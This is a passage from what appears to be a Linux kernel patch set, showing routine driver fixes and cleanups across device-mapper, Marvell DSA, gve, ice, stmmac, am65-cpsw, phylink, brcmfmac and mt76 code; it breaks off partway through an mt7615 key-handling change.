+diff --git a/drivers/md/persistent-data/dm-space-map-metadata.c b/drivers/md/persistent-data/dm-space-map-metadata.c
+index 392ae26134a4e..0d1fcdf29c835 100644
+--- a/drivers/md/persistent-data/dm-space-map-metadata.c
++++ b/drivers/md/persistent-data/dm-space-map-metadata.c
+@@ -94,8 +94,8 @@ struct block_op {
+ };
+ 
+ struct bop_ring_buffer {
+-	unsigned begin;
+-	unsigned end;
++	unsigned int begin;
++	unsigned int end;
+ 	struct block_op bops[MAX_RECURSIVE_ALLOCATIONS + 1];
+ };
+ 
+@@ -110,9 +110,9 @@ static bool brb_empty(struct bop_ring_buffer *brb)
+ 	return brb->begin == brb->end;
+ }
+ 
+-static unsigned brb_next(struct bop_ring_buffer *brb, unsigned old)
++static unsigned int brb_next(struct bop_ring_buffer *brb, unsigned int old)
+ {
+-	unsigned r = old + 1;
++	unsigned int r = old + 1;
+ 	return r >= ARRAY_SIZE(brb->bops) ? 0 : r;
+ }
+ 
+@@ -120,7 +120,7 @@ static int brb_push(struct bop_ring_buffer *brb,
+ 		    enum block_op_type type, dm_block_t b, dm_block_t e)
+ {
+ 	struct block_op *bop;
+-	unsigned next = brb_next(brb, brb->end);
++	unsigned int next = brb_next(brb, brb->end);
+ 
+ 	/*
+ 	 * We don't allow the last bop to be filled, this way we can
+@@ -171,8 +171,8 @@ struct sm_metadata {
+ 
+ 	dm_block_t begin;
+ 
+-	unsigned recursion_count;
+-	unsigned allocated_this_transaction;
++	unsigned int recursion_count;
++	unsigned int allocated_this_transaction;
+ 	struct bop_ring_buffer uncommitted;
+ 
+ 	struct threshold threshold;
+@@ -300,9 +300,9 @@ static int sm_metadata_get_count(struct dm_space_map *sm, dm_block_t b,
+ 				 uint32_t *result)
+ {
+ 	int r;
+-	unsigned i;
++	unsigned int i;
+ 	struct sm_metadata *smm = container_of(sm, struct sm_metadata, sm);
+-	unsigned adjustment = 0;
++	unsigned int adjustment = 0;
+ 
+ 	/*
+ 	 * We may have some uncommitted adjustments to add.  This list
+@@ -340,7 +340,7 @@ static int sm_metadata_count_is_more_than_one(struct dm_space_map *sm,
+ 					      dm_block_t b, int *result)
+ {
+ 	int r, adjustment = 0;
+-	unsigned i;
++	unsigned int i;
+ 	struct sm_metadata *smm = container_of(sm, struct sm_metadata, sm);
+ 	uint32_t rc;
+ 
+diff --git a/drivers/md/persistent-data/dm-transaction-manager.c b/drivers/md/persistent-data/dm-transaction-manager.c
+index 16643fc974e84..39885f8355847 100644
+--- a/drivers/md/persistent-data/dm-transaction-manager.c
++++ b/drivers/md/persistent-data/dm-transaction-manager.c
+@@ -28,14 +28,14 @@ struct prefetch_set {
+ 	dm_block_t blocks[PREFETCH_SIZE];
+ };
+ 
+-static unsigned prefetch_hash(dm_block_t b)
++static unsigned int prefetch_hash(dm_block_t b)
+ {
+ 	return hash_64(b, PREFETCH_BITS);
+ }
+ 
+ static void prefetch_wipe(struct prefetch_set *p)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	for (i = 0; i < PREFETCH_SIZE; i++)
+ 		p->blocks[i] = PREFETCH_SENTINEL;
+ }
+@@ -48,7 +48,7 @@ static void prefetch_init(struct prefetch_set *p)
+ 
+ static void prefetch_add(struct prefetch_set *p, dm_block_t b)
+ {
+-	unsigned h = prefetch_hash(b);
++	unsigned int h = prefetch_hash(b);
+ 
+ 	mutex_lock(&p->lock);
+ 	if (p->blocks[h] == PREFETCH_SENTINEL)
+@@ -59,7 +59,7 @@ static void prefetch_add(struct prefetch_set *p, dm_block_t b)
+ 
+ static void prefetch_issue(struct prefetch_set *p, struct dm_block_manager *bm)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	mutex_lock(&p->lock);
+ 
+@@ -103,7 +103,7 @@ struct dm_transaction_manager {
+ static int is_shadow(struct dm_transaction_manager *tm, dm_block_t b)
+ {
+ 	int r = 0;
+-	unsigned bucket = dm_hash_block(b, DM_HASH_MASK);
++	unsigned int bucket = dm_hash_block(b, DM_HASH_MASK);
+ 	struct shadow_info *si;
+ 
+ 	spin_lock(&tm->lock);
+@@ -123,7 +123,7 @@ static int is_shadow(struct dm_transaction_manager *tm, dm_block_t b)
+  */
+ static void insert_shadow(struct dm_transaction_manager *tm, dm_block_t b)
+ {
+-	unsigned bucket;
++	unsigned int bucket;
+ 	struct shadow_info *si;
+ 
+ 	si = kmalloc(sizeof(*si), GFP_NOIO);
+@@ -393,11 +393,11 @@ void dm_tm_dec_range(struct dm_transaction_manager *tm, dm_block_t b, dm_block_t
+ EXPORT_SYMBOL_GPL(dm_tm_dec_range);
+ 
+ void dm_tm_with_runs(struct dm_transaction_manager *tm,
+-		     const __le64 *value_le, unsigned count, dm_tm_run_fn fn)
++		     const __le64 *value_le, unsigned int count, dm_tm_run_fn fn)
+ {
+ 	uint64_t b, begin, end;
+ 	bool in_run = false;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < count; i++, value_le++) {
+ 		b = le64_to_cpu(*value_le);
+diff --git a/drivers/md/persistent-data/dm-transaction-manager.h b/drivers/md/persistent-data/dm-transaction-manager.h
+index 906c02ed0365b..0f573a4a01aeb 100644
+--- a/drivers/md/persistent-data/dm-transaction-manager.h
++++ b/drivers/md/persistent-data/dm-transaction-manager.h
+@@ -111,7 +111,7 @@ void dm_tm_dec_range(struct dm_transaction_manager *tm, dm_block_t b, dm_block_t
+  */
+ typedef void (*dm_tm_run_fn)(struct dm_transaction_manager *, dm_block_t, dm_block_t);
+ void dm_tm_with_runs(struct dm_transaction_manager *tm,
+-		     const __le64 *value_le, unsigned count, dm_tm_run_fn fn);
++		     const __le64 *value_le, unsigned int count, dm_tm_run_fn fn);
+ 
+ int dm_tm_ref(struct dm_transaction_manager *tm, dm_block_t b, uint32_t *result);
+ 
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index 8cf27e2654fcf..f1d9ee2a78b0f 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -5514,7 +5514,7 @@ static const struct mv88e6xxx_ops mv88e6393x_ops = {
+ 	 * .port_set_upstream_port method.
+ 	 */
+ 	.set_egress_port = mv88e6393x_set_egress_port,
+-	.watchdog_ops = &mv88e6390_watchdog_ops,
++	.watchdog_ops = &mv88e6393x_watchdog_ops,
+ 	.mgmt_rsvd2cpu = mv88e6393x_port_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
+ 	.reset = mv88e6352_g1_reset,
+diff --git a/drivers/net/dsa/mv88e6xxx/global2.c b/drivers/net/dsa/mv88e6xxx/global2.c
+index fa65ecd9cb853..ec49939968fac 100644
+--- a/drivers/net/dsa/mv88e6xxx/global2.c
++++ b/drivers/net/dsa/mv88e6xxx/global2.c
+@@ -931,6 +931,26 @@ const struct mv88e6xxx_irq_ops mv88e6390_watchdog_ops = {
+ 	.irq_free = mv88e6390_watchdog_free,
+ };
+ 
++static int mv88e6393x_watchdog_action(struct mv88e6xxx_chip *chip, int irq)
++{
++	mv88e6390_watchdog_action(chip, irq);
++
++	/* Fix for clearing the force WD event bit.
++	 * Unreleased erratum on mv88e6393x.
++	 */
++	mv88e6xxx_g2_write(chip, MV88E6390_G2_WDOG_CTL,
++			   MV88E6390_G2_WDOG_CTL_UPDATE |
++			   MV88E6390_G2_WDOG_CTL_PTR_EVENT);
++
++	return IRQ_HANDLED;
++}
++
++const struct mv88e6xxx_irq_ops mv88e6393x_watchdog_ops = {
++	.irq_action = mv88e6393x_watchdog_action,
++	.irq_setup = mv88e6390_watchdog_setup,
++	.irq_free = mv88e6390_watchdog_free,
++};
++
+ static irqreturn_t mv88e6xxx_g2_watchdog_thread_fn(int irq, void *dev_id)
+ {
+ 	struct mv88e6xxx_chip *chip = dev_id;
+diff --git a/drivers/net/dsa/mv88e6xxx/global2.h b/drivers/net/dsa/mv88e6xxx/global2.h
+index 7536b8b0ad011..c05fad5c9f19d 100644
+--- a/drivers/net/dsa/mv88e6xxx/global2.h
++++ b/drivers/net/dsa/mv88e6xxx/global2.h
+@@ -363,6 +363,7 @@ int mv88e6xxx_g2_device_mapping_write(struct mv88e6xxx_chip *chip, int target,
+ extern const struct mv88e6xxx_irq_ops mv88e6097_watchdog_ops;
+ extern const struct mv88e6xxx_irq_ops mv88e6250_watchdog_ops;
+ extern const struct mv88e6xxx_irq_ops mv88e6390_watchdog_ops;
++extern const struct mv88e6xxx_irq_ops mv88e6393x_watchdog_ops;
+ 
+ extern const struct mv88e6xxx_avb_ops mv88e6165_avb_ops;
+ extern const struct mv88e6xxx_avb_ops mv88e6352_avb_ops;
+diff --git a/drivers/net/ethernet/google/gve/gve.h b/drivers/net/ethernet/google/gve/gve.h
+index 160735484465a..458149a77ebe6 100644
+--- a/drivers/net/ethernet/google/gve/gve.h
++++ b/drivers/net/ethernet/google/gve/gve.h
+@@ -47,6 +47,8 @@
+ 
+ #define GVE_RX_BUFFER_SIZE_DQO 2048
+ 
++#define GVE_GQ_TX_MIN_PKT_DESC_BYTES 182
++
+ /* Each slot in the desc ring has a 1:1 mapping to a slot in the data ring */
+ struct gve_rx_desc_queue {
+ 	struct gve_rx_desc *desc_ring; /* the descriptor ring */
+diff --git a/drivers/net/ethernet/google/gve/gve_tx.c b/drivers/net/ethernet/google/gve/gve_tx.c
+index 4888bf05fbedb..5e11b82367545 100644
+--- a/drivers/net/ethernet/google/gve/gve_tx.c
++++ b/drivers/net/ethernet/google/gve/gve_tx.c
+@@ -284,8 +284,8 @@ static inline int gve_skb_fifo_bytes_required(struct gve_tx_ring *tx,
+ 	int bytes;
+ 	int hlen;
+ 
+-	hlen = skb_is_gso(skb) ? skb_checksum_start_offset(skb) +
+-				 tcp_hdrlen(skb) : skb_headlen(skb);
++	hlen = skb_is_gso(skb) ? skb_checksum_start_offset(skb) + tcp_hdrlen(skb) :
++				 min_t(int, GVE_GQ_TX_MIN_PKT_DESC_BYTES, skb->len);
+ 
+ 	pad_bytes = gve_tx_fifo_pad_alloc_one_frag(&tx->tx_fifo,
+ 						   hlen);
+@@ -454,13 +454,11 @@ static int gve_tx_add_skb_copy(struct gve_priv *priv, struct gve_tx_ring *tx, st
+ 	pkt_desc = &tx->desc[idx];
+ 
+ 	l4_hdr_offset = skb_checksum_start_offset(skb);
+-	/* If the skb is gso, then we want the tcp header in the first segment
+-	 * otherwise we want the linear portion of the skb (which will contain
+-	 * the checksum because skb->csum_start and skb->csum_offset are given
+-	 * relative to skb->head) in the first segment.
++	/* If the skb is gso, then we want the tcp header alone in the first segment
++	 * otherwise we want the minimum required by the gVNIC spec.
+ 	 */
+ 	hlen = is_gso ? l4_hdr_offset + tcp_hdrlen(skb) :
+-			skb_headlen(skb);
++			min_t(int, GVE_GQ_TX_MIN_PKT_DESC_BYTES, skb->len);
+ 
+ 	info->skb =  skb;
+ 	/* We don't want to split the header, so if necessary, pad to the end
+diff --git a/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c b/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
+index a2645ff3100e4..7f72604079723 100644
+--- a/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
++++ b/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
+@@ -541,6 +541,21 @@ static void ice_vc_fdir_rem_prof_all(struct ice_vf *vf)
+ 	}
+ }
+ 
++/**
++ * ice_vc_fdir_reset_cnt_all - reset all FDIR counters for this VF FDIR
++ * @fdir: pointer to the VF FDIR structure
++ */
++static void ice_vc_fdir_reset_cnt_all(struct ice_vf_fdir *fdir)
++{
++	enum ice_fltr_ptype flow;
++
++	for (flow = ICE_FLTR_PTYPE_NONF_NONE;
++	     flow < ICE_FLTR_PTYPE_MAX; flow++) {
++		fdir->fdir_fltr_cnt[flow][0] = 0;
++		fdir->fdir_fltr_cnt[flow][1] = 0;
++	}
++}
++
+ /**
+  * ice_vc_fdir_has_prof_conflict
+  * @vf: pointer to the VF structure
+@@ -1871,7 +1886,7 @@ int ice_vc_add_fdir_fltr(struct ice_vf *vf, u8 *msg)
+ 		v_ret = VIRTCHNL_STATUS_SUCCESS;
+ 		stat->status = VIRTCHNL_FDIR_FAILURE_RULE_NORESOURCE;
+ 		dev_dbg(dev, "VF %d: set FDIR context failed\n", vf->vf_id);
+-		goto err_free_conf;
++		goto err_rem_entry;
+ 	}
+ 
+ 	ret = ice_vc_fdir_write_fltr(vf, conf, true, is_tun);
+@@ -1880,15 +1895,16 @@ int ice_vc_add_fdir_fltr(struct ice_vf *vf, u8 *msg)
+ 		stat->status = VIRTCHNL_FDIR_FAILURE_RULE_NORESOURCE;
+ 		dev_err(dev, "VF %d: writing FDIR rule failed, ret:%d\n",
+ 			vf->vf_id, ret);
+-		goto err_rem_entry;
++		goto err_clr_irq;
+ 	}
+ 
+ exit:
+ 	kfree(stat);
+ 	return ret;
+ 
+-err_rem_entry:
++err_clr_irq:
+ 	ice_vc_fdir_clear_irq_ctx(vf);
++err_rem_entry:
+ 	ice_vc_fdir_remove_entry(vf, conf, conf->flow_id);
+ err_free_conf:
+ 	devm_kfree(dev, conf);
+@@ -1997,6 +2013,7 @@ void ice_vf_fdir_init(struct ice_vf *vf)
+ 	spin_lock_init(&fdir->ctx_lock);
+ 	fdir->ctx_irq.flags = 0;
+ 	fdir->ctx_done.flags = 0;
++	ice_vc_fdir_reset_cnt_all(fdir);
+ }
+ 
+ /**
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac-intel.c b/drivers/net/ethernet/stmicro/stmmac/dwmac-intel.c
+index 13aa919633b47..ab9f876b6df7e 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac-intel.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac-intel.c
+@@ -251,7 +251,6 @@ static void intel_speed_mode_2500(struct net_device *ndev, void *intel_data)
+ 		priv->plat->mdio_bus_data->xpcs_an_inband = false;
+ 	} else {
+ 		priv->plat->max_speed = 1000;
+-		priv->plat->mdio_bus_data->xpcs_an_inband = true;
+ 	}
+ }
+ 
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 93321437f0933..fa3ce3b0d9a56 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -1132,20 +1132,26 @@ static void stmmac_check_pcs_mode(struct stmmac_priv *priv)
+ static int stmmac_init_phy(struct net_device *dev)
+ {
+ 	struct stmmac_priv *priv = netdev_priv(dev);
++	struct fwnode_handle *phy_fwnode;
+ 	struct fwnode_handle *fwnode;
+ 	int ret;
+ 
++	if (!phylink_expects_phy(priv->phylink))
++		return 0;
++
+ 	fwnode = of_fwnode_handle(priv->plat->phylink_node);
+ 	if (!fwnode)
+ 		fwnode = dev_fwnode(priv->device);
+ 
+ 	if (fwnode)
+-		ret = phylink_fwnode_phy_connect(priv->phylink, fwnode, 0);
++		phy_fwnode = fwnode_get_phy_node(fwnode);
++	else
++		phy_fwnode = NULL;
+ 
+ 	/* Some DT bindings do not set-up the PHY handle. Let's try to
+ 	 * manually parse it
+ 	 */
+-	if (!fwnode || ret) {
++	if (!phy_fwnode || IS_ERR(phy_fwnode)) {
+ 		int addr = priv->plat->phy_addr;
+ 		struct phy_device *phydev;
+ 
+@@ -1161,6 +1167,9 @@ static int stmmac_init_phy(struct net_device *dev)
+ 		}
+ 
+ 		ret = phylink_connect_phy(priv->phylink, phydev);
++	} else {
++		fwnode_handle_put(phy_fwnode);
++		ret = phylink_fwnode_phy_connect(priv->phylink, fwnode, 0);
+ 	}
+ 
+ 	if (!priv->plat->pmt) {
+@@ -6618,6 +6627,8 @@ int stmmac_xdp_open(struct net_device *dev)
+ 		goto init_error;
+ 	}
+ 
++	stmmac_reset_queues_param(priv);
++
+ 	/* DMA CSR Channel configuration */
+ 	for (chan = 0; chan < dma_csr_ch; chan++) {
+ 		stmmac_init_chan(priv, priv->ioaddr, priv->plat->dma_cfg, chan);
+@@ -6944,7 +6955,7 @@ static void stmmac_napi_del(struct net_device *dev)
+ int stmmac_reinit_queues(struct net_device *dev, u32 rx_cnt, u32 tx_cnt)
+ {
+ 	struct stmmac_priv *priv = netdev_priv(dev);
+-	int ret = 0;
++	int ret = 0, i;
+ 
+ 	if (netif_running(dev))
+ 		stmmac_release(dev);
+@@ -6953,6 +6964,10 @@ int stmmac_reinit_queues(struct net_device *dev, u32 rx_cnt, u32 tx_cnt)
+ 
+ 	priv->plat->rx_queues_to_use = rx_cnt;
+ 	priv->plat->tx_queues_to_use = tx_cnt;
++	if (!netif_is_rxfh_configured(dev))
++		for (i = 0; i < ARRAY_SIZE(priv->rss.table); i++)
++			priv->rss.table[i] = ethtool_rxfh_indir_default(i,
++									rx_cnt);
+ 
+ 	stmmac_napi_add(dev);
+ 
+diff --git a/drivers/net/ethernet/ti/am65-cpsw-nuss.c b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+index 8ff1c84a23ce7..25466cbdc16bd 100644
+--- a/drivers/net/ethernet/ti/am65-cpsw-nuss.c
++++ b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+@@ -2819,7 +2819,8 @@ err_free_phylink:
+ 	am65_cpsw_nuss_phylink_cleanup(common);
+ 	am65_cpts_release(common->cpts);
+ err_of_clear:
+-	of_platform_device_destroy(common->mdio_dev, NULL);
++	if (common->mdio_dev)
++		of_platform_device_destroy(common->mdio_dev, NULL);
+ err_pm_clear:
+ 	pm_runtime_put_sync(dev);
+ 	pm_runtime_disable(dev);
+@@ -2848,7 +2849,8 @@ static int am65_cpsw_nuss_remove(struct platform_device *pdev)
+ 	am65_cpsw_nuss_phylink_cleanup(common);
+ 	am65_cpts_release(common->cpts);
+ 
+-	of_platform_device_destroy(common->mdio_dev, NULL);
++	if (common->mdio_dev)
++		of_platform_device_destroy(common->mdio_dev, NULL);
+ 
+ 	pm_runtime_put_sync(&pdev->dev);
+ 	pm_runtime_disable(&pdev->dev);
+diff --git a/drivers/net/phy/phylink.c b/drivers/net/phy/phylink.c
+index a202ce6611fde..4073e8243df3f 100644
+--- a/drivers/net/phy/phylink.c
++++ b/drivers/net/phy/phylink.c
+@@ -1552,6 +1552,25 @@ void phylink_destroy(struct phylink *pl)
+ }
+ EXPORT_SYMBOL_GPL(phylink_destroy);
+ 
++/**
++ * phylink_expects_phy() - Determine if phylink expects a phy to be attached
++ * @pl: a pointer to a &struct phylink returned from phylink_create()
++ *
++ * When using fixed-link mode, or in-band mode with 1000base-X or 2500base-X,
++ * no PHY is needed.
++ *
++ * Returns true if phylink will be expecting a PHY.
++ */
++bool phylink_expects_phy(struct phylink *pl)
++{
++	if (pl->cfg_link_an_mode == MLO_AN_FIXED ||
++	    (pl->cfg_link_an_mode == MLO_AN_INBAND &&
++	     phy_interface_mode_is_8023z(pl->link_config.interface)))
++		return false;
++	return true;
++}
++EXPORT_SYMBOL_GPL(phylink_expects_phy);
++
+ static void phylink_phy_change(struct phy_device *phydev, bool up)
+ {
+ 	struct phylink *pl = phydev->phylink;
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/bcmsdh.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/bcmsdh.c
+index d0daef674e728..e300278ea38c6 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/bcmsdh.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/bcmsdh.c
+@@ -991,15 +991,34 @@ static const struct sdio_device_id brcmf_sdmmc_ids[] = {
+ MODULE_DEVICE_TABLE(sdio, brcmf_sdmmc_ids);
+ 
+ 
+-static void brcmf_sdiod_acpi_set_power_manageable(struct device *dev,
+-						  int val)
++static void brcmf_sdiod_acpi_save_power_manageable(struct brcmf_sdio_dev *sdiodev)
+ {
+ #if IS_ENABLED(CONFIG_ACPI)
+ 	struct acpi_device *adev;
+ 
+-	adev = ACPI_COMPANION(dev);
++	adev = ACPI_COMPANION(&sdiodev->func1->dev);
+ 	if (adev)
+-		adev->flags.power_manageable = 0;
++		sdiodev->func1_power_manageable = adev->flags.power_manageable;
++
++	adev = ACPI_COMPANION(&sdiodev->func2->dev);
++	if (adev)
++		sdiodev->func2_power_manageable = adev->flags.power_manageable;
++#endif
++}
++
++static void brcmf_sdiod_acpi_set_power_manageable(struct brcmf_sdio_dev *sdiodev,
++						  int enable)
++{
++#if IS_ENABLED(CONFIG_ACPI)
++	struct acpi_device *adev;
++
++	adev = ACPI_COMPANION(&sdiodev->func1->dev);
++	if (adev)
++		adev->flags.power_manageable = enable ? sdiodev->func1_power_manageable : 0;
++
++	adev = ACPI_COMPANION(&sdiodev->func2->dev);
++	if (adev)
++		adev->flags.power_manageable = enable ? sdiodev->func2_power_manageable : 0;
+ #endif
+ }
+ 
+@@ -1009,7 +1028,6 @@ static int brcmf_ops_sdio_probe(struct sdio_func *func,
+ 	int err;
+ 	struct brcmf_sdio_dev *sdiodev;
+ 	struct brcmf_bus *bus_if;
+-	struct device *dev;
+ 
+ 	brcmf_dbg(SDIO, "Enter\n");
+ 	brcmf_dbg(SDIO, "Class=%x\n", func->class);
+@@ -1017,14 +1035,9 @@ static int brcmf_ops_sdio_probe(struct sdio_func *func,
+ 	brcmf_dbg(SDIO, "sdio device ID: 0x%04x\n", func->device);
+ 	brcmf_dbg(SDIO, "Function#: %d\n", func->num);
+ 
+-	dev = &func->dev;
+-
+ 	/* Set MMC_QUIRK_LENIENT_FN0 for this card */
+ 	func->card->quirks |= MMC_QUIRK_LENIENT_FN0;
+ 
+-	/* prohibit ACPI power management for this device */
+-	brcmf_sdiod_acpi_set_power_manageable(dev, 0);
+-
+ 	/* Consume func num 1 but dont do anything with it. */
+ 	if (func->num == 1)
+ 		return 0;
+@@ -1055,6 +1068,7 @@ static int brcmf_ops_sdio_probe(struct sdio_func *func,
+ 	dev_set_drvdata(&sdiodev->func1->dev, bus_if);
+ 	sdiodev->dev = &sdiodev->func1->dev;
+ 
++	brcmf_sdiod_acpi_save_power_manageable(sdiodev);
+ 	brcmf_sdiod_change_state(sdiodev, BRCMF_SDIOD_DOWN);
+ 
+ 	brcmf_dbg(SDIO, "F2 found, calling brcmf_sdiod_probe...\n");
+@@ -1120,6 +1134,8 @@ void brcmf_sdio_wowl_config(struct device *dev, bool enabled)
+ 
+ 	if (sdiodev->settings->bus.sdio.oob_irq_supported ||
+ 	    pm_caps & MMC_PM_WAKE_SDIO_IRQ) {
++		/* Stop ACPI from turning off the device when wowl is enabled */
++		brcmf_sdiod_acpi_set_power_manageable(sdiodev, !enabled);
+ 		sdiodev->wowl_enabled = enabled;
+ 		brcmf_dbg(SDIO, "Configuring WOWL, enabled=%d\n", enabled);
+ 		return;
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/sdio.h b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/sdio.h
+index b76d34d36bde6..0d18ed15b4032 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/sdio.h
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/sdio.h
+@@ -188,6 +188,8 @@ struct brcmf_sdio_dev {
+ 	char nvram_name[BRCMF_FW_NAME_LEN];
+ 	char clm_name[BRCMF_FW_NAME_LEN];
+ 	bool wowl_enabled;
++	bool func1_power_manageable;
++	bool func2_power_manageable;
+ 	enum brcmf_sdiod_state state;
+ 	struct brcmf_sdiod_freezer *freezer;
+ 	const struct firmware *clm_fw;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7603/main.c b/drivers/net/wireless/mediatek/mt76/mt7603/main.c
+index ca50feb0b3a9d..1b1358c6bb464 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7603/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7603/main.c
+@@ -512,15 +512,15 @@ mt7603_set_key(struct ieee80211_hw *hw, enum set_key_cmd cmd,
+ 	    !(key->flags & IEEE80211_KEY_FLAG_PAIRWISE))
+ 		return -EOPNOTSUPP;
+ 
+-	if (cmd == SET_KEY) {
+-		key->hw_key_idx = wcid->idx;
+-		wcid->hw_key_idx = idx;
+-	} else {
++	if (cmd != SET_KEY) {
+ 		if (idx == wcid->hw_key_idx)
+ 			wcid->hw_key_idx = -1;
+ 
+-		key = NULL;
++		return 0;
+ 	}
++
++	key->hw_key_idx = wcid->idx;
++	wcid->hw_key_idx = idx;
+ 	mt76_wcid_key_setup(&dev->mt76, wcid, key);
+ 
+ 	return mt7603_wtbl_set_key(dev, wcid->idx, key);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7615/mac.c b/drivers/net/wireless/mediatek/mt76/mt7615/mac.c
+index 2ce1705c0f433..a0412a29fb491 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7615/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7615/mac.c
+@@ -1180,8 +1180,7 @@ EXPORT_SYMBOL_GPL(mt7615_mac_set_rates);
+ static int
+ mt7615_mac_wtbl_update_key(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+ 			   struct ieee80211_key_conf *key,
+-			   enum mt76_cipher_type cipher, u16 cipher_mask,
+-			   enum set_key_cmd cmd)
++			   enum mt76_cipher_type cipher, u16 cipher_mask)
+ {
+ 	u32 addr = mt7615_mac_wtbl_addr(dev, wcid->idx) + 30 * 4;
+ 	u8 data[32] = {};
+@@ -1190,27 +1189,18 @@ mt7615_mac_wtbl_update_key(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+ 		return -EINVAL;
+ 
+ 	mt76_rr_copy(dev, addr, data, sizeof(data));
+-	if (cmd == SET_KEY) {
+-		if (cipher == MT_CIPHER_TKIP) {
+-			/* Rx/Tx MIC keys are swapped */
+-			memcpy(data, key->key, 16);
+-			memcpy(data + 16, key->key + 24, 8);
+-			memcpy(data + 24, key->key + 16, 8);
+-		} else {
+-			if (cipher_mask == BIT(cipher))
+-				memcpy(data, key->key, key->keylen);
+-			else if (cipher != MT_CIPHER_BIP_CMAC_128)
+-				memcpy(data, key->key, 16);
+-			if (cipher == MT_CIPHER_BIP_CMAC_128)
+-				memcpy(data + 16, key->key, 16);
+-		}
++	if (cipher == MT_CIPHER_TKIP) {
++		/* Rx/Tx MIC keys are swapped */
++		memcpy(data, key->key, 16);
++		memcpy(data + 16, key->key + 24, 8);
++		memcpy(data + 24, key->key + 16, 8);
+ 	} else {
++		if (cipher_mask == BIT(cipher))
++			memcpy(data, key->key, key->keylen);
++		else if (cipher != MT_CIPHER_BIP_CMAC_128)
++			memcpy(data, key->key, 16);
+ 		if (cipher == MT_CIPHER_BIP_CMAC_128)
+-			memset(data + 16, 0, 16);
+-		else if (cipher_mask)
+-			memset(data, 0, 16);
+-		if (!cipher_mask)
+-			memset(data, 0, sizeof(data));
++			memcpy(data + 16, key->key, 16);
+ 	}
+ 
+ 	mt76_wr_copy(dev, addr, data, sizeof(data));
+@@ -1221,7 +1211,7 @@ mt7615_mac_wtbl_update_key(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+ static int
+ mt7615_mac_wtbl_update_pk(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+ 			  enum mt76_cipher_type cipher, u16 cipher_mask,
+-			  int keyidx, enum set_key_cmd cmd)
++			  int keyidx)
+ {
+ 	u32 addr = mt7615_mac_wtbl_addr(dev, wcid->idx), w0, w1;
+ 
+@@ -1240,9 +1230,7 @@ mt7615_mac_wtbl_update_pk(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+ 	else
+ 		w0 &= ~MT_WTBL_W0_RX_IK_VALID;
+ 
+-	if (cmd == SET_KEY &&
+-	    (cipher != MT_CIPHER_BIP_CMAC_128 ||
+-	     cipher_mask == BIT(cipher))) {
++	if (cipher != MT_CIPHER_BIP_CMAC_128 || cipher_mask == BIT(cipher)) {
+ 		w0 &= ~MT_WTBL_W0_KEY_IDX;
+ 		w0 |= FIELD_PREP(MT_WTBL_W0_KEY_IDX, keyidx);
+ 	}
+@@ -1259,19 +1247,10 @@ mt7615_mac_wtbl_update_pk(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+ 
+ static void
+ mt7615_mac_wtbl_update_cipher(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+-			      enum mt76_cipher_type cipher, u16 cipher_mask,
+-			      enum set_key_cmd cmd)
++			      enum mt76_cipher_type cipher, u16 cipher_mask)
+ {
+ 	u32 addr = mt7615_mac_wtbl_addr(dev, wcid->idx);
+ 
+-	if (!cipher_mask) {
+-		mt76_clear(dev, addr + 2 * 4, MT_WTBL_W2_KEY_TYPE);
+-		return;
+-	}
+-
+-	if (cmd != SET_KEY)
+-		return;
+-
+ 	if (cipher == MT_CIPHER_BIP_CMAC_128 &&
+ 	    cipher_mask & ~BIT(MT_CIPHER_BIP_CMAC_128))
+ 		return;
+@@ -1282,8 +1261,7 @@ mt7615_mac_wtbl_update_cipher(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+ 
+ int __mt7615_mac_wtbl_set_key(struct mt7615_dev *dev,
+ 			      struct mt76_wcid *wcid,
+-			      struct ieee80211_key_conf *key,
+-			      enum set_key_cmd cmd)
++			      struct ieee80211_key_conf *key)
+ {
+ 	enum mt76_cipher_type cipher;
+ 	u16 cipher_mask = wcid->cipher;
+@@ -1293,19 +1271,14 @@ int __mt7615_mac_wtbl_set_key(struct mt7615_dev *dev,
+ 	if (cipher == MT_CIPHER_NONE)
+ 		return -EOPNOTSUPP;
+ 
+-	if (cmd == SET_KEY)
+-		cipher_mask |= BIT(cipher);
+-	else
+-		cipher_mask &= ~BIT(cipher);
+-
